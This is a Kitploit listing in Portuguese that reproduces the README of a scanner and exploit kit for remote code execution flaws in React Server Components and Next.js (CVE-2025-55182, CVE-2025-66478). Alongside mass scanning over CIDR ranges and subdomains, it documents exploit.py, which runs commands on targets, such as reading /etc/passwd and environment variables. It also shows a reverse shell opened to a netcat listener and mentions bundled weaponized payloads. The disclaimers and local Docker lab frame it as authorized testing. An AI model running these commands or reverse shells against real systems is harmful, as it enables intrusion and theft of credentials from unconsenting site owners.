Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
Ferramentas/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Gerenciamento de Indicadores de Comprometimento (IOC)Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebInteligência de AmeaçasEnumeração de SubdomíniosAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

Ver Repositório
25há 8 mesesAinda não revisado
Compartilhar

Scanner Empresarial React2Shell

Scanner de vulnerabilidades de alta fidelidade para CVE-2025-55182 e CVE-2025-66478 - Vulnerabilidades de Execução Remota de Código em React Server Components / Next.js.

📖 Para análise técnica detalhada, mecânica de exploração e dados IOC, consulte SECURITY-RESEARCH.md


⚠️ AVISO

Esta ferramenta é fornecida APENAS para FINS EDUCACIONAIS E DE TESTES DE SEGURANÇA AUTORIZADOS. O acesso não autorizado a sistemas de computador é ilegal. Use estas ferramentas apenas em sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. Os autores não assumem qualquer responsabilidade pelo uso indevido.


🚨 Visão Geral da Vulnerabilidade

CVEDescriçãoCVSS
CVE-2025-55182RCE por Desserialização Insegura em React Server Components9.8 Crítico
CVE-2025-66478RCE em Server Actions do Next.js9.8 Crítico

Pacotes Afetados:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Versões Corrigidas:

  • 19.0.1, 19.1.2, 19.2.1 (para todos os pacotes)

✨ Funcionalidades

  • Entrada multi-alvo: URL única, arquivos de hosts, intervalos CIDR, intervalos de IP
  • Enumeração de subdomínios: Descoberta automática de subdomínios
  • Fingerprinting de tecnologia: Detecta Next.js antes do teste
  • Modo de detecção segura: Detecção de canal lateral sem execução de código
  • Verificação de RCE: Prova de conceito baseada em aritmética
  • Correlação de IOC: Verificação contra infraestrutura maliciosa conhecida
  • Integração com Phoenix Security: Envio de descobertas para a plataforma Phoenix
  • Varredura concorrente: Multithread para escala

📦 Instalação

Usando uv (recomendado)

root@kitploit:~
# Nenhuma instalação necessária - uv gerencia as dependências
uv run react2shell-scanner -u https://example.com

Usando pip

root@kitploit:~
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Uso

Varredura Básica

root@kitploit:~
# URL única
python3 react2shell-scanner -u https://example.com

# Modo seguro (sem execução de RCE)
python3 react2shell-scanner -u https://example.com --safe-check

# A partir de arquivo de hosts
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# Intervalo CIDR
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Múltiplos intervalos CIDR
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Varredura Avançada

root@kitploit:~
# Enumeração de subdomínios
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Wordlist personalizada de subdomínios
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Caminhos personalizados
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Ignorar fingerprinting (varrer tudo)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verboso com SSL desativado
python3 react2shell-scanner -u https://example.com -k -v

Integração com Phoenix Security

root@kitploit:~
# Envio de descobertas para a Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Modo de depuração (salvar payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Enviar todos os resultados (não apenas vulnerabilidades)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Configuração

Configuração do Phoenix Security

Crie .phoenix.config:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

Ou use variáveis de ambiente:

root@kitploit:~
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Laboratório de Teste

Um ambiente de teste baseado em Docker está incluído. Consulte Lab-instructions-sample.md para referência rápida.

root@kitploit:~
# Iniciar laboratório
cd test-lab/lab
docker-compose up -d

# Serviços:
# - Vulnerável: http://localhost:3011
# - Corrigido:   http://localhost:3012

# Testar instância vulnerável (coleta segura de evidências)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Testar instância corrigida
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Executar demonstração completa
./test-and-demo.sh --full-demo

⚠️ Nota: Comandos de exploração (ex.: exploit.py -c "whoami") acionam RCE REAL. Use apenas em contêineres Docker locais para fins de pesquisa.

💻 Ferramenta de Exploração (exploit.py)

Execute comandos em alvos vulneráveis. Requer Python 3.11+

Instalação

root@kitploit:~
cd test-lab
pip3.11 install -r requirements.txt
# Ou: pip3.11 install rich-click fake-useragent rich requests

Exemplos de Execução de Comando

root@kitploit:~
# Execução básica de comando
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Saída: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Saída: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Saída: 99e28775bf80 (ID do contêiner)

# Enumeração do sistema
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Reconhecimento da aplicação
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Saída: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Informações de rede
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Enumeração de processos
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Shell Reverso (Avançado)

root@kitploit:~
# Obter gateway da rede Docker
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Iniciar ouvinte (em outro terminal)
nc -lvnp 4444

# Lançar shell reverso
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Tipos de payload disponíveis: nc, nc-mkfifo, sh, bash, perl

Opções do Exploit

OpçãoDescrição
-u, --urlURL do alvo (obrigatório)
-c, --cmdComando a executar
-r, --reverseAtivar modo shell reverso
-l, --lhostHost do ouvinte para shell reverso
-p, --lportPorta do ouvinte para shell reverso
-P, --payloadTipo de payload: nc, nc-mkfifo, sh, bash, perl
--timeoutTempo limite da requisição (padrão: 10s)

📊 Formatos de Saída

Saída no Console

root@kitploit:~
[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

Saída JSON

root@kitploit:~
{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 Correlação de IOC

O scanner inclui Indicadores de Compromisso conhecidos de campanhas de exploração ativas:

  • 32 IPs maliciosos de payloads-exploits/iocs.csv
  • Payloads armados de payloads-exploits/weaponized-payloads
  • IOCs estendidos incluindo domínios, URLs, hashes de arquivos e carteiras cripto em payloads-exploits/iocs_patterns.csv

Correspondências de IOC detectadas são sinalizadas com alta severidade.

Arquivos IOC

ArquivoConteúdo
iocs.csv32 IPs maliciosos conhecidos com dados de geolocalização
iocs_patterns.csvIOCs estendidos: domínios C2, URLs de droppers, hashes de malware, carteiras Monero
weaponized-payloadsPayloads de ataques do mundo real observados em exploração ativa
exploit-2025-55182Formato de requisição HTTP bruta para o exploit

🛡️ Métodos de Detecção

Verificação Segura de Canal Lateral (--safe-check)

  • Envia payload malformado que dispara resposta de erro
  • Sem execução de código no alvo
  • Detecta se o alvo tem desserialização vulnerável
  • Recomendado para reconhecimento passivo

Verificação Aritmética de RCE (padrão)

  • Envia payload que executa echo $((41*271))
  • Verifica se a resposta contém o resultado calculado (11111)
  • Confirma capacidade real de execução de código
  • Use apenas em alvos autorizados

📁 Estrutura do Projeto

root@kitploit:~
react2shell-scanner-CVE-2025-55182/
├── react2shell-scanner          # Script principal do scanner
├── cve-2025-66478-web-scan     # Scanner de referência original
├── nuclei-rules                 # Template Nuclei
├── test-and-demo.sh            # Automação de testes
├── README.md                    # Este arquivo
├── SECURITY-RESEARCH.md         # Análise técnica detalhada
├── Lab-instructions-sample.md   # Guia rápido de testes em laboratório
├── payloads-exploits/
│   ├── iocs.csv                 # IPs maliciosos conhecidos
│   ├── iocs_patterns.csv        # IOCs estendidos (domínios, URLs, hashes)
│   ├── weaponized-payloads      # Payloads de ataque do mundo real
│   └── exploit-2025-55182       # Requisição HTTP bruta do exploit
└── test-lab/
    ├── exploit.py               # Ferramenta de exploração
    ├── lab/
    │   ├── docker-compose.yml
    │   ├── vulnerable/          # Aplicação Next.js vulnerável
    │   └── patched/             # Aplicação Next.js corrigida
    └── packages/
        ├── vulnerable/          # Pacotes npm vulneráveis
        └── patched/             # Pacotes npm corrigidos

🔗 Repositórios Relacionados

RepositórioFinalidade
react2shell-scanner-CVE-2025-55182Laboratórios, scanner e exploits (este repositório)
react2shell-scanner-rce-react-nextScanner completo com interface web

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para testes de segurança autorizados. Você deve ter permissão explícita por escrito antes de escanear qualquer alvo. Escaneamentos não autorizados podem violar leis de crimes de informática.

Use com responsabilidade:

  • Escaneie apenas sistemas que você possui ou tem autorização para testar
  • Documente sua autorização
  • Relate vulnerabilidades através dos canais apropriados
  • Siga práticas de divulgação responsável

📚 Referências

  • Comunicado CVE-2025-55182
  • Blog de Segurança do React
  • Comunicado de Segurança do Next.js GHSA-9qr9-h5gf-34mp
  • Registro de Alterações da Vercel
  • Pesquisa da Assetnote

🙏 Créditos

  • Equipe de Pesquisa de Segurança Assetnote - Pesquisa original de vulnerabilidade
  • Chocapikk - Desenvolvimento do exploit
  • Phoenix Security - Integração com a plataforma

Trazido a você por pesquisadores de segurança trabalhando para tornar a web mais segura.

Baixar ferramenta